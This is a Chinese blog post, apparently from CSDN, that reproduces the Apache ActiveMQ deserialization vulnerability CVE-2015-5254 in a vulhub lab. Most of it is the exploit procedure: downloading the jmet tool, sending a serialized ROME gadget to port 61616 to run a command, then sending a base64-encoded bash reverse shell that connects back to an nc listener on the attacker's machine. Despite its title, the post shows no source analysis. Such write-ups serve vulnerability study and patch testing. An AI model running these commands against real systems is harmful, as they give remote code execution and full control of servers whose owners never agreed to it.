activemq_CVE-2015-5254_漏洞复现_源码分析

qq_51550750

已于 2022-06-03 16:30:32 修改

阅读量600

点赞数 1

分类专栏：漏洞复现网络安全文章标签：安全 java ActiveMQ反序列化漏洞

于 2022-06-03 16:25:32 首次发布

本文链接：https://blog.csdn.net/qq_51550750/article/details/125112202

版权

网络安全同时被 2 个专栏收录

77 篇文章 17 订阅

订阅专栏

漏洞复现

5 篇文章 0 订阅

订阅专栏

0x01_漏洞简介

Apache ActiveMQ是由美国阿帕奇（Apache）软件基金会开发的开源消息中间件，支持Java消息服务、集群、Spring框架等。属于消息队列组件(消息队列组件：分布式系统中的重要组件，主要解决应用耦合、异步消息、流量削峰等)。
ApacheActive MQ5.13.0版本之前到5.x版本的安全漏洞，该程序引起的漏洞不限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化Java消息服务(JMS) ObjectMessage对象，利用该漏洞执行任意代码。

漏洞版本:

Apache ActiveMQ 5.x ~ Apache ActiveMQ 5.13.0

0x02_漏洞复现

【1】进入漏洞所在目录：

[root@localhost vulhub]# cd activemq
[root@localhost activemq]# ls
CVE-2015-5254  CVE-2016-3088
[root@localhost activemq]# cd CVE-2015-5254/
[root@localhost CVE-2015-5254]#

【2】启动环境并查看端口
在这里插入图片描述
访问ip:8161

【3】在攻击机（kali）中，构建攻击payload，利用jmet生成一个序列化的对象

（1）下载jmet的jar文件

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

在这里插入图片描述

【2】给目标ActiveMQ添加一个名为event的队列，此时就成功给服务器添加了一个“事件”

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “touch /tmp/hack_for_fun” -Yp ROME 172.16.135.201 61616

上面的172.16.135.201是靶机的IP（有洞的IP）

但是报错了：
在这里插入图片描述
没关系，接着下一步：

靶机访问：
在这里插入图片描述
admin/admin

因为我执行了两次命令，所以，出现了两个：并且点击一个
在这里插入图片描述
点击之后跳转到：

再看看靶机的/tmp目录下：

docker ps

在这里插入图片描述
CONTAINER ID是9794c7f87d0a，

docker exec -it 9794c7f87d0a /bin/bash

在这里插入图片描述

在这里插入图片描述
看到有创建的hack_for_fun就是利用成功了

【3】获取目标机系统控制权
在kali中监听9999端口

nc -lvp 9999

在这里插入图片描述

首先payload是：
payload为 bash -i >& /dev/tcp/172.16.135.210/9999 0>&1

反弹shell的命令就不用多说了吧

但是要进行base64编码：
在这里插入图片描述

YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTM1LjIxMC85OTk5IDA+JjE=

再就是和之前一样利用jmet-0.1.0-all.jar

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTM1LjIxMC85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 172.16.135.201 61616

靶机点击之后，就会反弹shell
在这里插入图片描述